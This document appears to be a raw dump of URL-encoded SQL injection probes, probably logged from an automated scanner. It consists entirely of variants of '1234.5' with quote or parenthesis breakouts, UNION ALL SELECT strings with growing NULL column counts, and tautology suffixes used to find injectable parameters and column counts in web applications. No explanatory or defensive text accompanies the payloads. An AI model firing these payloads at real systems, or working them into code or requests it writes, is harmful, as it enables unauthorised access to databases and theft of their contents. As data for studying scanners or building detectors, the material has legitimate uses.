1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287986%3D7986 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288434%3D8434 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285214%3D5214 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285198%3D5198 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289032%3D9032 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284590%3D4590 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287689%3D7689 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289755%3D9755 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283423%3D3423 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282690%3D2690 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281523%3D1523 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283411%3D3411 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287248%3D7248 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287968%3D7968 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288589%3D8589 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287713%3D7713 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286543%3D6543 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289189%3D9189 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287205%3D7205 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281931%3D1931 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284585%3D4585 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281681%3D1681 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288765%3D8765 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286239%3D6239 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285728%3D5728 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283312%3D3312 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%282488%3D2488 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281472%3D1472 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285970%3D5970 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286405%3D6405 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27wbaj%27%3D%27wbaj 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27SFtT%27%3D%27SFtT 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27OBcr%27%3D%27OBcr 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27GQLJ%27%3D%27GQLJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27QlYy%27%3D%27QlYy 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27woVd%27%3D%27woVd 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27LLwK%27%3D%27LLwK 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27vLhW%27%3D%27vLhW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27tVKI%27%3D%27tVKI 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27QhkB%27%3D%27QhkB 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Nauv%27%3D%27Nauv 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27wzOC%27%3D%27wzOC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27FFaX%27%3D%27FFaX 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27dkvw%27%3D%27dkvw 